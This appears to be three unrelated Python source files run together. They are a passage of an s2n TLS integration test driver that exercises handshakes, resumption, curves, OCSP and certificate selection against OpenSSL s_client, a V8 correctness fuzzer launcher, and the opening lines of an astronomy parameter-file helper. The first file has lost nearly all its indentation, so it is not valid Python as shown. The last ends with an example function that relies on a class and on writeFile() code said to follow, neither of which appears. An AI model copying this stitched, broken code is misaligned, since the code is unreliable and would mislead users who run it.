:param bool enter_fips_mode: True if s2nd should enter libcrypto's FIPS mode. Libcrypto must be built with a FIPS module to enter FIPS mode.
:param bool client_auth: True if the test should try and use client authentication
:param str client_cert: Path to the client's cert file
:param str client_key: Path to the client's private key file
:param str expected_cipher: the cipher we expect to negotiate
:param list expected_extensions: list of expected extensions that s_client should receive.
    :return: 0 on successful negotiation(s), -1 on failure
"""
# Override certificate for ECDSA if unspecified. We can remove this when we
# support multiple certificates
if server_cert is None and server_cert_key_list is None and "ECDSA" in cipher:
server_cert = TEST_ECDSA_CERT
server_key = TEST_ECDSA_KEY
# Fire up s2nd
s2nd_cmd = ["../../bin/s2nd"]
if server_cert is not None:
s2nd_cmd.extend(["--cert", server_cert])
if server_key is not None:
s2nd_cmd.extend(["--key", server_key])
if server_cert_key_list is not None:
for cert_key_path in server_cert_key_list:
cert_path = cert_key_path[0]
key_path = cert_key_path[1]
s2nd_cmd.extend(["--cert", cert_path])
s2nd_cmd.extend(["--key", key_path])
if ocsp is not None:
s2nd_cmd.extend(["--ocsp", ocsp])
if prefer_low_latency == True:
s2nd_cmd.append("--prefer-low-latency")
if client_auth is not None:
s2nd_cmd.append("-m")
s2nd_cmd.extend(["-t", client_cert])
s2nd_cmd.extend([str(endpoint), str(port)])
s2nd_ciphers = "test_all"
if server_cipher_pref is not None:
s2nd_ciphers = server_cipher_pref
if enter_fips_mode == True:
s2nd_ciphers = "test_all_fips"
s2nd_cmd.append("--enter-fips-mode")
s2nd_cmd.append("-c")
s2nd_cmd.append(s2nd_ciphers)
if no_ticket:
s2nd_cmd.append("-T")
if use_corked_io:
s2nd_cmd.append("-C")
s2nd = subprocess.Popen(s2nd_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Make sure s2nd has started
s2nd.stdout.readline()
s_client_cmd = ["openssl", "s_client", PROTO_VERS_TO_S_CLIENT_ARG[ssl_version],
"-connect", str(endpoint) + ":" + str(port)]
if cipher is not None:
s_client_cmd.extend(["-cipher", cipher])
if sig_algs is not None:
s_client_cmd.extend(["-sigalgs", sig_algs])
if curves is not None:
s_client_cmd.extend(["-curves", curves])
if resume == True:
s_client_cmd.append("-reconnect")
if client_auth is not None:
s_client_cmd.extend(["-key", client_key])
s_client_cmd.extend(["-cert", client_cert])
if ocsp is not None:
s_client_cmd.append("-status")
if server_name is not None:
s_client_cmd.extend(["-servername", server_name])
if strict_hostname is True:
s_client_cmd.extend(["-verify_hostname", server_name])
else:
s_client_cmd.append("-noservername")
    # Enable TLS extension debugging so we can verify the extensions s2nd sends
s_client_cmd.append("-tlsextdebug")
# Fire up s_client
s_client = subprocess.Popen(s_client_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
s_client_out = ""
s2nd_out = ""
openssl_connect_marker = "CONNECTED"
openssl_reconnect_marker = "drop connection and then reconnect"
end_of_msg_marker = "__end_of_msg__"
# Wait until openssl and s2n have finished the handshake and are connected to each other
s_client_out += read_process_output_until(s_client, openssl_connect_marker)
s2nd_out += read_process_output_until(s2nd, openssl_connect_marker)
if resume == True:
for i in range(0,5):
# Wait for openssl to resume connection 5 times in a row, and verify resumption works.
s_client_out += read_process_output_until(s_client, openssl_reconnect_marker)
s2nd_out += read_process_output_until(s2nd, openssl_connect_marker)
data_to_validate = cipher + " " + str(uuid.uuid4())
# Write the data to openssl towards s2n server
msg = (data_to_validate + "\n" + end_of_msg_marker + "\n\n").encode("utf-8")
s_client.stdin.write(msg)
s_client.stdin.flush()
# Write the data to s2n towards openssl client
s2nd.stdin.write(msg)
s2nd.stdin.flush()
# Wait for the Data transfer to complete between OpenSSL and s2n
s_client_out += read_process_output_until(s_client, end_of_msg_marker)
s2nd_out += read_process_output_until(s2nd, end_of_msg_marker)
cleanup_processes(s2nd, s_client)
if validate_data_transfer(data_to_validate, s_client_out, s2nd_out) != 0:
return -1
if resume is True:
if validate_resume(s2nd_out) != 0:
return -1
if ocsp is not None:
if validate_ocsp(s_client_out) != 0:
return -1
if expected_cipher is not None:
if find_expected_cipher(expected_cipher, s_client_out) != 0:
return -1
if strict_hostname is True:
if validate_hostname(s_client_out) != 0:
return -1
if expected_server_cert is not None:
if validate_selected_certificate(s_client_out, expected_server_cert) != 0:
return -1
if expected_extensions is not None:
for extension in expected_extensions:
if extension.s_client_validate(s_client_out) != 0:
return -1
return 0
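# Illustrative usage sketch (hypothetical host/port, not an actual test case):
# negotiate a TLS 1.2 handshake with session resumption and verify the expected
# cipher, mirroring how the test drivers below invoke try_handshake.
def _example_try_handshake(host="127.0.0.1", port=8888):
    cipher = "ECDHE-RSA-AES128-GCM-SHA256"
    return try_handshake(host, port, cipher, S2N_TLS12, resume=True,
                         expected_cipher=cipher)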
def cert_path_to_str(cert_path):
# Converts a path to a cert into a string usable for printing to test output
# Example: "./test_certs/rsa_2048_sha256_client_cert.pem" => "RSA-2048-SHA256"
return '-'.join(cert_path[cert_path.rfind('/')+1:].split('_')[:3]).upper()
def print_result(result_prefix, return_code):
suffix = ""
if return_code == 0:
if sys.stdout.isatty():
suffix = "\033[32;1mPASSED\033[0m"
else:
suffix = "PASSED"
else:
if sys.stdout.isatty():
suffix = "\033[31;1mFAILED\033[0m"
else:
suffix ="FAILED"
print(result_prefix + suffix)
def create_thread_pool():
threadpool_size = multiprocessing.cpu_count() * 4 # Multiply by 4 to increase parallelization between integration tests
print("\tCreating ThreadPool of size: " + str(threadpool_size))
threadpool = ThreadPool(processes=threadpool_size)
return threadpool
def run_handshake_test(host, port, ssl_version, cipher, fips_mode, no_ticket, use_client_auth, client_cert_path, client_key_path):
cipher_name = cipher.openssl_name
cipher_vers = cipher.min_tls_vers
# Skip the cipher if openssl can't test it. 3DES/RC4 are disabled by default in 1.1.1
if not cipher.openssl_1_1_1_compatible:
return 0
if ssl_version < cipher_vers:
return 0
client_cert_str=str(use_client_auth)
if (use_client_auth is not None) and (client_cert_path is not None):
client_cert_str = cert_path_to_str(client_cert_path)
ret = try_handshake(host, port, cipher_name, ssl_version, no_ticket=no_ticket, enter_fips_mode=fips_mode, client_auth=use_client_auth, client_cert=client_cert_path, client_key=client_key_path)
result_prefix = "Cipher: %-30s ClientCert: %-16s Vers: %-8s ... " % (cipher_name, client_cert_str, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
return ret
def handshake_test(host, port, test_ciphers, fips_mode, no_ticket=False, use_client_auth=None, use_client_cert=None, use_client_key=None):
"""
Basic handshake tests using all valid combinations of supported cipher suites and TLS versions.
"""
print("\n\tRunning handshake tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
threadpool = create_thread_pool()
port_offset = 0
results = []
for cipher in test_ciphers:
async_result = threadpool.apply_async(run_handshake_test, (host, port + port_offset, ssl_version, cipher, fips_mode, no_ticket, use_client_auth, use_client_cert, use_client_key))
port_offset += 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
def client_auth_test(host, port, test_ciphers, fips_mode):
failed = 0
print("\n\tRunning client auth tests:")
for filename in os.listdir(TEST_CERT_DIRECTORY):
if "client_cert" in filename and "rsa" in filename:
client_cert_path = TEST_CERT_DIRECTORY + filename
client_key_path = TEST_CERT_DIRECTORY + filename.replace("client_cert", "client_key")
ret = handshake_test(host, port, test_ciphers, fips_mode, no_ticket=True, use_client_auth=True, use_client_cert=client_cert_path, use_client_key=client_key_path)
            if ret != 0:
failed += 1
return failed
def run_resume_test(host, port, cipher_name, ssl_version, resume, no_ticket, fips_mode):
ret = try_handshake(host, port, cipher_name, ssl_version, resume=resume, no_ticket=no_ticket, enter_fips_mode=fips_mode)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
return ret
def resume_test(host, port, test_ciphers, fips_mode, no_ticket=False):
"""
Tests s2n's session resumption capability using all valid combinations of cipher suite and TLS version.
"""
if no_ticket:
print("\n\tRunning resumption tests using session id:")
else:
print("\n\tRunning resumption tests using session ticket:")
failed = 0
results = []
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
port_offset = 0
threadpool = create_thread_pool()
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
for cipher in test_ciphers:
cipher_name = cipher.openssl_name
cipher_vers = cipher.min_tls_vers
# Skip the cipher if openssl can't test it. 3DES/RC4 are disabled by default in 1.1.1
if not cipher.openssl_1_1_1_compatible:
continue
if ssl_version < cipher_vers:
continue
async_result = threadpool.apply_async(run_resume_test, (host, port + port_offset, cipher_name, ssl_version, True, no_ticket, fips_mode))
port_offset += 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
supported_sigs = ["RSA+SHA1", "RSA+SHA224", "RSA+SHA256", "RSA+SHA384", "RSA+SHA512"]
unsupported_sigs = ["ECDSA+SHA256", "ECDSA+SHA512"]
def run_sigalg_test(host, port, cipher, ssl_version, permutation, fips_mode, use_client_auth, no_ticket):
# Put some unsupported algs in front to make sure we gracefully skip them
mixed_sigs = unsupported_sigs + list(permutation)
mixed_sigs_str = ':'.join(mixed_sigs)
ret = try_handshake(host, port, cipher.openssl_name, ssl_version, sig_algs=mixed_sigs_str, no_ticket=no_ticket, enter_fips_mode=fips_mode, client_auth=use_client_auth)
    # Trim the RSA part off for brevity. Users should know we only support RSA at the moment.
prefix = "Digests: %-35s ClientAuth: %-6s Vers: %-8s... " % (':'.join([x[4:] for x in permutation]), str(use_client_auth), S2N_PROTO_VERS_TO_STR[S2N_TLS12])
print_result(prefix, ret)
return ret
def sigalg_test(host, port, fips_mode, use_client_auth=None, no_ticket=False):
"""
Acceptance test for supported signature algorithms. Tests all possible supported sigalgs with unsupported ones mixed in
for noise.
"""
failed = 0
print("\n\tRunning signature algorithm tests:")
print("\tExpected supported: " + str(supported_sigs))
print("\tExpected unsupported: " + str(unsupported_sigs))
for size in range(1, len(supported_sigs) + 1):
print("\n\t\tTesting ciphers using signature preferences of size: " + str(size))
threadpool = create_thread_pool()
        port_offset = 0
results = []
# Produce permutations of every accepted signature algorithm in every possible order
for permutation in itertools.permutations(supported_sigs, size):
for cipher in ALL_TEST_CIPHERS:
# Try an ECDHE cipher suite and a DHE one
if(cipher.openssl_name == "ECDHE-RSA-AES128-GCM-SHA256" or cipher.openssl_name == "DHE-RSA-AES128-GCM-SHA256"):
                    async_result = threadpool.apply_async(run_sigalg_test, (host, port + port_offset, cipher, S2N_TLS12, permutation, fips_mode, use_client_auth, no_ticket))
                    port_offset += 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
def elliptic_curve_test(host, port, fips_mode):
"""
Acceptance test for supported elliptic curves. Tests all possible supported curves with unsupported curves mixed in
for noise.
"""
supported_curves = ["P-256", "P-384"]
unsupported_curves = ["B-163", "K-409"]
print("\n\tRunning elliptic curve tests:")
print("\tExpected supported: " + str(supported_curves))
print("\tExpected unsupported: " + str(unsupported_curves))
failed = 0
for size in range(1, len(supported_curves) + 1):
print("\n\t\tTesting ciphers using curve list of size: " + str(size))
# Produce permutations of every accepted curve in every possible order
for permutation in itertools.permutations(supported_curves, size):
# Put some unsupported curves in front to make sure we gracefully skip them
mixed_curves = unsupported_curves + list(permutation)
mixed_curves_str = ':'.join(mixed_curves)
for cipher in filter(lambda x: x.openssl_name == "ECDHE-RSA-AES128-GCM-SHA256" or x.openssl_name == "ECDHE-RSA-AES128-SHA", ALL_TEST_CIPHERS):
if fips_mode and cipher.openssl_fips_compatible == False:
continue
ret = try_handshake(host, port, cipher.openssl_name, S2N_TLS12, curves=mixed_curves_str, enter_fips_mode=fips_mode)
prefix = "Curves: %-40s Vers: %10s ... " % (':'.join(list(permutation)), S2N_PROTO_VERS_TO_STR[S2N_TLS12])
print_result(prefix, ret)
if ret != 0:
failed = 1
return failed
def elliptic_curve_fallback_test(host, port, fips_mode):
"""
Tests graceful fallback when s2n doesn't support any curves offered by the client. A non-ecc suite should be
negotiated.
"""
failed = 0
# Make sure s2n can still negotiate a non-EC kx(AES256-GCM-SHA384) suite if we don't match anything on the client
unsupported_curves = ["B-163", "K-409"]
ret = try_handshake(host, port, "ECDHE-RSA-AES128-SHA256:AES256-GCM-SHA384", S2N_TLS12, curves=":".join(unsupported_curves), enter_fips_mode=fips_mode)
print_result("%-65s ... " % "Testing curve mismatch fallback", ret)
if ret != 0:
failed = 1
return failed
def handshake_fragmentation_test(host, port, fips_mode):
"""
    Tests successful negotiation with s_client despite message fragmentation. Max record size is clamped to force s2n
    to fragment the ServerCertificate message.
"""
print("\n\tRunning handshake fragmentation tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
# Cipher isn't relevant for this test, pick one available in all OpenSSL versions and all TLS versions
cipher_name = "AES256-SHA"
# Low latency option indirectly forces fragmentation.
ret = try_handshake(host, port, cipher_name, ssl_version, prefer_low_latency=True, enter_fips_mode=fips_mode)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
if ret != 0:
failed = 1
return failed
def ocsp_stapling_test(host, port, fips_mode):
"""
Test s2n's server OCSP stapling capability
"""
print("\n\tRunning OCSP stapling tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
# Cipher isn't relevant for this test, pick one available in all TLS versions
cipher_name = "AES256-SHA"
ret = try_handshake(host, port, cipher_name, ssl_version, enter_fips_mode=fips_mode, server_cert=TEST_OCSP_CERT, server_key=TEST_OCSP_KEY,
ocsp=TEST_OCSP_RESPONSE_FILE)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
if ret != 0:
failed = 1
return failed
def cert_type_cipher_match_test(host, port):
"""
Test s2n server's ability to correctly choose ciphers. (Especially RSA vs ECDSA)
"""
print("\n\tRunning cipher matching tests:")
failed = 0
cipher = "ALL"
supported_curves = "P-256:P-384"
# Handshake with RSA cert + ECDSApriority server cipher pref (must skip ecdsa ciphers)
rsa_ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cipher_pref="test_ecdsa_priority")
result_prefix = "Cert Type: rsa Server Pref: ecdsa priority. Vers: TLSv1.2 ... "
print_result(result_prefix, rsa_ret)
if rsa_ret != 0:
failed = 1
# Handshake with ECDSA cert + RSA priority server cipher prefs (must skip rsa ciphers)
ecdsa_ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert=TEST_ECDSA_CERT, server_key=TEST_ECDSA_KEY, server_cipher_pref="test_all")
result_prefix = "Cert Type: ecdsa Server Pref: rsa priority. Vers: TLSv1.2 ... "
print_result(result_prefix, ecdsa_ret)
if ecdsa_ret != 0:
failed = 1
return failed
def multiple_cert_type_test(host, port):
"""
Test s2n server's ability to correctly choose ciphers and serve the correct cert depending on the auth type for a
given cipher.
"""
print("\n\tRunning multiple server cert type test:")
# Basic handshake with ECDSA cert + RSA cert
for cipher in ["ECDHE-ECDSA-AES128-SHA", "ECDHE-RSA-AES128-GCM-SHA256"]:
supported_curves = "P-256:P-384"
server_prefs = "test_all"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no ecdsa ciphers configured on the server
for cipher in ["ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES128-GCM-SHA256", "AES128-SHA"]:
supported_curves = "P-256:P-384"
server_prefs = "20170210"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no rsa ciphers configured on the server
for cipher in ["ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-GCM-SHA256", "ECDHE-ECDSA-AES256-SHA"]:
supported_curves = "P-256:P-384"
server_prefs = "test_all_ecdsa"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no overlapping ecc curves for ECDHE kx.
# s2n should fallback to a cipher with RSA kx.
for cipher in ["ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-GCM-SHA256:AES128-SHA", "ECDHE-ECDSA-AES256-SHA:AES128-SHA"]:
# Assume this is a curve s2n does not support
supported_curves = "P-521"
server_prefs = "test_all"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
return 0
def multiple_cert_domain_name_test(host, port):
'''
Test s2n server's ability to select the correct certificate based on the client ServerName extension.
    Validates that the correct certificate is selected and that s_client does not throw any hostname validation errors.
'''
print("\n\tRunning multiple server cert domain name test:")
for test_case in MULTI_CERT_TEST_CASES:
cert_key_list = [(cert[0],cert[1]) for cert in test_case.server_certs]
client_sni = test_case.client_sni
client_ciphers = test_case.client_ciphers
expected_cert_path = test_case.expected_cert[0]
expect_hostname_match = test_case.expect_matching_hostname
ret = try_handshake(host, port, client_ciphers, S2N_TLS12, server_name=client_sni,
expected_extensions = [TlsExtensionServerName] if expect_hostname_match == True else None,
strict_hostname=expect_hostname_match, server_cert_key_list=cert_key_list, expected_server_cert=expected_cert_path)
result_prefix = "\nDescription: %s\n\nclient_sni: %s\nclient_ciphers: %s\nexpected_cert: %s\nexpect_hostname_match: %s\nresult: " % (test_case.description,
client_sni,
client_ciphers,
expected_cert_path,
expect_hostname_match)
print_result(result_prefix, ret)
if ret != 0:
return ret
return 0
def main():
parser = argparse.ArgumentParser(description='Runs TLS server integration tests against s2nd using Openssl s_client')
parser.add_argument('host', help='The host for s2nd to bind to')
parser.add_argument('port', type=int, help='The port for s2nd to bind to')
parser.add_argument('--use_corked_io', action='store_true', help='Turn corked IO on/off')
parser.add_argument('--libcrypto', default='openssl-1.1.1', choices=['openssl-1.0.2', 'openssl-1.0.2-fips', 'openssl-1.1.1', 'libressl'],
help="""The Libcrypto that s2n was built with. s2n supports different cipher suites depending on
libcrypto version. Defaults to openssl-1.1.1.""")
args = parser.parse_args()
    # use_corked_io is a module-level flag read by try_handshake(), so rebind
    # the global rather than shadowing it with a local.
    global use_corked_io
    use_corked_io = args.use_corked_io
# Retrieve the test ciphers to use based on the libcrypto version s2n was built with
test_ciphers = S2N_LIBCRYPTO_TO_TEST_CIPHERS[args.libcrypto]
host = args.host
port = args.port
fips_mode = False
if environ.get("S2N_TEST_IN_FIPS_MODE") is not None:
fips_mode = True
print("\nRunning s2nd in FIPS mode.")
print("\nRunning tests with: " + os.popen('openssl version').read())
if use_corked_io == True:
print("Corked IO is on")
failed = 0
failed += resume_test(host, port, test_ciphers, fips_mode, no_ticket=True)
failed += resume_test(host, port, test_ciphers, fips_mode)
failed += handshake_test(host, port, test_ciphers, fips_mode)
failed += client_auth_test(host, port, test_ciphers, fips_mode)
failed += sigalg_test(host, port, fips_mode)
failed += sigalg_test(host, port, fips_mode, use_client_auth=True, no_ticket=True)
failed += elliptic_curve_test(host, port, fips_mode)
failed += elliptic_curve_fallback_test(host, port, fips_mode)
failed += handshake_fragmentation_test(host, port, fips_mode)
failed += ocsp_stapling_test(host, port, fips_mode)
failed += cert_type_cipher_match_test(host, port)
failed += multiple_cert_type_test(host, port)
failed += multiple_cert_domain_name_test(host, port)
return failed
if __name__ == "__main__":
sys.exit(main())
|
|
#!/usr/bin/env python
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
V8 correctness fuzzer launcher script.
"""
import argparse
import hashlib
import itertools
import json
import os
import re
import sys
import traceback
import v8_commands
import v8_suppressions
CONFIGS = dict(
default=[],
  validate_asm=['--validate-asm'],  # Maybe add '--disable-asm-warnings'
fullcode=['--nocrankshaft', '--turbo-filter=~'],
noturbo=['--turbo-filter=~', '--noturbo-asm'],
noturbo_opt=['--always-opt', '--turbo-filter=~', '--noturbo-asm'],
ignition_staging=['--ignition-staging'],
ignition_turbo=['--ignition-staging', '--turbo'],
ignition_turbo_opt=['--ignition-staging', '--turbo', '--always-opt'],
)
# Timeout in seconds for one d8 run.
TIMEOUT = 3
# Return codes.
RETURN_PASS = 0
RETURN_FAIL = 2
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
PREAMBLE = [
os.path.join(BASE_PATH, 'v8_mock.js'),
os.path.join(BASE_PATH, 'v8_suppressions.js'),
]
FLAGS = ['--abort_on_stack_overflow', '--expose-gc', '--allow-natives-syntax',
'--invoke-weak-callbacks', '--omit-quit', '--es-staging']
SUPPORTED_ARCHS = ['ia32', 'x64', 'arm', 'arm64']
# Output for suppressed failure case.
FAILURE_HEADER_TEMPLATE = """#
# V8 correctness failure
# V8 correctness configs: %(configs)s
# V8 correctness sources: %(sources)s
# V8 correctness suppression: %(suppression)s
"""
# Extended output for failure case. The 'CHECK' is for the minimizer.
FAILURE_TEMPLATE = FAILURE_HEADER_TEMPLATE + """#
# CHECK
#
# Compared %(first_config_label)s with %(second_config_label)s
#
# Flags of %(first_config_label)s:
%(first_config_flags)s
# Flags of %(second_config_label)s:
%(second_config_flags)s
#
# Difference:
%(difference)s
#
### Start of configuration %(first_config_label)s:
%(first_config_output)s
### End of configuration %(first_config_label)s
#
### Start of configuration %(second_config_label)s:
%(second_config_output)s
### End of configuration %(second_config_label)s
"""
FUZZ_TEST_RE = re.compile(r'.*fuzz(-\d+\.js)')
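# Illustrative sketch of the metadata-file deduction performed in parse_args()
# below: FUZZ_TEST_RE strips any minimization prefix before "fuzz" and keeps
# the numeric suffix. The file name used here is hypothetical.
def _example_meta_data_path(testcase='out/prefix-fuzz-123.js'):
  suffix = FUZZ_TEST_RE.match(os.path.basename(testcase)).group(1)
  return os.path.join(os.path.dirname(testcase), 'meta' + suffix)  # out/meta-123.js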
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--random-seed', type=int, required=True,
help='random seed passed to both runs')
parser.add_argument(
'--first-arch', help='first architecture', default='x64')
parser.add_argument(
'--second-arch', help='second architecture', default='x64')
parser.add_argument(
'--first-config', help='first configuration', default='fullcode')
parser.add_argument(
'--second-config', help='second configuration', default='fullcode')
parser.add_argument(
'--first-d8', default='d8',
help='optional path to first d8 executable, '
'default: bundled in the same directory as this script')
parser.add_argument(
'--second-d8',
help='optional path to second d8 executable, default: same as first')
parser.add_argument('testcase', help='path to test case')
options = parser.parse_args()
# Ensure we make a sane comparison.
assert (options.first_arch != options.second_arch or
options.first_config != options.second_config) , (
'Need either arch or config difference.')
assert options.first_arch in SUPPORTED_ARCHS
assert options.second_arch in SUPPORTED_ARCHS
assert options.first_config in CONFIGS
assert options.second_config in CONFIGS
# Ensure we have a test case.
assert (os.path.exists(options.testcase) and
os.path.isfile(options.testcase)), (
'Test case %s doesn\'t exist' % options.testcase)
# Deduce metadata file name from test case. This also removes
# the prefix the test case might get during minimization.
suffix = FUZZ_TEST_RE.match(os.path.basename(options.testcase)).group(1)
options.meta_data_path = os.path.join(
os.path.dirname(options.testcase), 'meta' + suffix)
assert os.path.exists(options.meta_data_path), (
'Metadata %s doesn\'t exist' % options.meta_data_path)
# Use first d8 as default for second d8.
options.second_d8 = options.second_d8 or options.first_d8
# Ensure absolute paths.
if not os.path.isabs(options.first_d8):
options.first_d8 = os.path.join(BASE_PATH, options.first_d8)
if not os.path.isabs(options.second_d8):
options.second_d8 = os.path.join(BASE_PATH, options.second_d8)
# Ensure executables exist.
assert os.path.exists(options.first_d8)
assert os.path.exists(options.second_d8)
# Ensure we use different executables when we claim we compare
# different architectures.
# TODO(machenbach): Infer arch from gn's build output.
if options.first_arch != options.second_arch:
assert options.first_d8 != options.second_d8
return options
def test_pattern_bailout(testcase, ignore_fun):
"""Print failure state and return if ignore_fun matches testcase."""
with open(testcase) as f:
bug = (ignore_fun(f.read()) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression=bug)
return True
return False
def pass_bailout(output, step_number):
"""Print info and return if in timeout or crash pass states."""
if output.HasTimedOut():
# Dashed output, so that no other clusterfuzz tools can match the
# words timeout or crash.
print '# V8 correctness - T-I-M-E-O-U-T %d' % step_number
return True
if output.HasCrashed():
print '# V8 correctness - C-R-A-S-H %d' % step_number
return True
return False
def fail_bailout(output, ignore_by_output_fun):
"""Print failure state and return if ignore_by_output_fun matches output."""
bug = (ignore_by_output_fun(output.stdout) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression=bug)
return True
return False
def main():
options = parse_args()
# Suppressions are architecture and configuration specific.
suppress = v8_suppressions.get_suppression(
options.first_arch, options.first_config,
options.second_arch, options.second_config,
)
if test_pattern_bailout(options.testcase, suppress.ignore):
return RETURN_FAIL
# Get metadata.
with open(options.meta_data_path) as f:
metadata = json.load(f)
common_flags = FLAGS + ['--random-seed', str(options.random_seed)]
first_config_flags = common_flags + CONFIGS[options.first_config]
second_config_flags = common_flags + CONFIGS[options.second_config]
def run_d8(d8, config_flags):
args = [d8] + config_flags + PREAMBLE + [options.testcase]
if d8.endswith('.py'):
# Wrap with python in tests.
args = [sys.executable] + args
return v8_commands.Execute(
args,
cwd=os.path.dirname(options.testcase),
timeout=TIMEOUT,
)
first_config_output = run_d8(options.first_d8, first_config_flags)
# Early bailout based on first run's output.
if pass_bailout(first_config_output, 1):
return RETURN_PASS
if fail_bailout(first_config_output, suppress.ignore_by_output1):
return RETURN_FAIL
second_config_output = run_d8(options.second_d8, second_config_flags)
# Bailout based on second run's output.
if pass_bailout(second_config_output, 2):
return RETURN_PASS
if fail_bailout(second_config_output, suppress.ignore_by_output2):
return RETURN_FAIL
difference = suppress.diff(
first_config_output.stdout, second_config_output.stdout)
if difference:
# The first three entries will be parsed by clusterfuzz. Format changes
# will require changes on the clusterfuzz side.
first_config_label = '%s,%s' % (options.first_arch, options.first_config)
second_config_label = '%s,%s' % (options.second_arch, options.second_config)
hsh = lambda x: hashlib.sha1(x).hexdigest()[:8]
print FAILURE_TEMPLATE % dict(
configs='%s:%s' % (first_config_label, second_config_label),
sources=','.join(map(hsh, metadata['sources'])),
suppression='', # We can't tie bugs to differences.
first_config_label=first_config_label,
second_config_label=second_config_label,
first_config_flags=' '.join(first_config_flags),
second_config_flags=' '.join(second_config_flags),
first_config_output=first_config_output.stdout,
second_config_output=second_config_output.stdout,
difference=difference,
)
return RETURN_FAIL
# TODO(machenbach): Figure out if we could also return a bug in case there's
# no difference, but one of the line suppressions has matched - and without
# the match there would be a difference.
print '# V8 correctness - pass'
return RETURN_PASS
if __name__ == "__main__":
try:
result = main()
except SystemExit:
# Make sure clusterfuzz reports internal errors and wrong usage.
# Use one label for all internal and usage errors.
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression='wrong_usage')
result = RETURN_FAIL
except Exception as e:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression='internal_error')
print '# Internal error: %s' % e
traceback.print_exc(file=sys.stdout)
result = RETURN_FAIL
sys.exit(result)
|
|
import os
import numpy as np
import matplotlib
import logging
import glob
import astropy, astropy.io.ascii
_log = logging.getLogger('mcfostpy')
# this lets you put "stop()" in your code to have a debugger breakpoint
from IPython.core.debugger import Tracer; stop = Tracer()
# some extremely simple classes to serve as structs.
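# Illustrative usage sketch (hypothetical values and file name): populate the
# NaN-defaulted fields consumed by the sections of writeFile() reproduced
# below, then serialize. The numbers here are arbitrary placeholders, not
# recommended settings.
def _example_write_paramfile(path='example.par'):
    par = Paramfile(path)
    par.nbr_photons_eq_th = 1.28e5
    par.nbr_photons_lambda = 1.28e4
    par.nbr_photons_image = 1.28e5
    par.n_lambda, par.lambda_min, par.lambda_max = 50, 0.1, 3000.0
    par.grid_geometry = 1  # cylindrical
    par.grid_n_rad, par.grid_nz = 100, 70
    par.grid_n_az, par.grid_n_rad_in = 1, 30
    par.map_grid_nx = par.map_grid_ny = 251
    par.map_grid_size = 400.0
    par.mc = 10
    par.distance = 140.0
    par.zone1_dust_mass = 1e-3
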